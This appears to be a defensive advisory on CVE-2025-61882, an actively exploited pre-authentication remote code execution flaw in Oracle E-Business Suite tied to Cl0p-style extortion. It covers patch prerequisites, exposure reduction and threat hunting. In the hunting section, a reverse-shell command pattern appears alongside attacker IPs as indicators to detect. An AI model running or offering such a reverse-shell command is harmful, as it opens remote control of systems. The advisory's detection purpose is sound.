Oracle issues urgent patch for CVE-2025-61882 vulnerability

Oracle released an out-of-band security alert for CVE-2025-61882 in E-Business Suite (EBS) 12.2.3 through 12.2.14, confirming a pre-authentication RCE over HTTP that attackers have exploited in the wild. Multiple investigations link the exploitation to Cl0p-style extortion, with mass email campaigns claiming theft of EBS data. This guide explains the vulnerability, the current threat activity, exactly what to patch, how to triage for compromise, and a step-by-step plan you can execute in the next 24 hours.

TL,DR for Busy Leaders

• What it is: Pre-auth RCE in Oracle EBS, CVSS 9.8, exploited. Oracle+1
• Who is hitting it: Extortion actors tied to Cl0p tactics with mass executive outreach, some overlap with FIN11 investigations.
• Risk: Data theft and complete takeover of EBS concurrent processing. Oracle
• Action: Apply Oracle’s out-of-band patch, confirm October 2023 CPU prerequisite, hunt IOCs now, assume potential compromise if exposed. Oracle

What is CVE-2025-61882

It's a vulnerability in Oracle Concurrent Processing within E-Business Suite, BI Publisher integration, enabling an unauthenticated attacker with network access via HTTP to execute code and take over the component. Oracle scored it CVSS 9.8. Supported affected versions are 12.2.3 to 12.2.14. Oracle notes that if HTTP is listed, secure variants like HTTPS are implicitly impacted. Oracle

Why it is severe:

• No login required.
• Low complexity.
• Full confidentiality, integrity, availability impact. NVD

Affected products: Oracle E-Business Suite 12.2.3 through 12.2.14

Current Threat Landscape, What is Actually Happening

• Active exploitation: Oracle, national agencies, and industry reporting confirm in-the-wild exploitation and a public proof-of-concept. Cyber Security Agency of Singapore
• Extortion emails: Executives at US companies are receiving mass extortion emails claiming EBS data theft. Multiple briefings reference Cl0p-style tactics and in some cases linkages to FIN11 infrastructure. Reuters
• Emergency patching: Oracle issued an out-of-band Security Alert on October 4, 2025, with IOCs and a specific October 2023 CPU prerequisite noted for applying the fix. Oracle
• Industry corroboration: SecurityWeek, Tenable, Help Net Security, and CSA Singapore highlight pre-auth RCE, exploitation at scale, and advise immediate patching and hunting.

Patching and Hardening, Exactly What to Do

1) Verify prerequisites
Oracle states that the October 2023 Critical Patch Update must be installed before applying the new Security Alert patch for CVE-2025-61882. Confirm CPU level on each EBS instance.

2) Apply the out-of-band patch
Use the Patch Availability Document for your exact EBS version 12.2.3 to 12.2.14. Apply immediately on internet-exposed instances, then on internal instances.

3) Reduce exposure

• Temporarily restrict EBS HTTP access at the edge until patched.
• Enforce IP allowlists or VPN.
• Monitor and rate limit suspicious inbound traffic to EBS.
  These steps reduce the attack surface during patch windows.

4) Confirm secure variant coverage
Oracle clarifies that if HTTP is listed, HTTPS is implicitly affected. Do not assume TLS protects you from exploitation.

Detection and Hunting, High-Signal Checks

Oracle and agencies shared IOCs. Focus on ingress from the following IPs, suspicious command invocations, and files with known hashes:

• 200.107.207[.]26, 185.181.60[.]11
• Shell pattern like sh -c /bin/bash -i >& /dev/tcp// 0>&1
• Hashes associated with exploit artifacts, including oracle_ebs_nday_exploit_poc_* Oracle

Where to look first

• Reverse proxy and WAF logs for EBS paths that touch BI Publisher integration.
• EBS Concurrent Processing logs for unusual job creations, job terminations, or shell invocations from the app service account.
• Operating system logs on EBS app tiers for outbound connections, particularly to unfamiliar IPs.
• File integrity monitoring for recent drops or modified templates in BI Publisher integration.

Telemetry tips

• Build quick detections for the command pattern above.
• Hunt by JA3/JA4 fingerprints or unusual TLS SNI if HTTPS fronting is in play.
• Enrich IPs with passive DNS. Block and retro hunt 30 days back.

If you find any suspicious indicator, treat the host as compromised. Isolate, acquire evidence, and proceed with IR.

Indicators of Compromise (IOCs)

Indicators of Compromise (IOCs)

FAQs (Frequently Asked Questions)

What is CVE-2025-61882
A pre-auth RCE in Oracle EBS Concurrent Processing, BI Publisher integration, affecting 12.2.3 to 12.2.14.

Is it actively exploited
Yes. Multiple alerts and reports indicate exploitation and public PoC.

Do I need October 2023 CPU
Yes, Oracle states this prerequisite explicitly for applying the fix.

Does HTTPS protect me
No. Oracle’s risk matrix implies secure variants are also impacted. Patch and restrict exposure.

Which IOCs should I hunt
Specific IPs, a reverse shell command pattern, and file hashes linked to exploit artifacts.

Who is behind the attacks
Extortion activity aligns with Cl0p-style tactics. Some reports mention overlap with FIN11 infrastructure.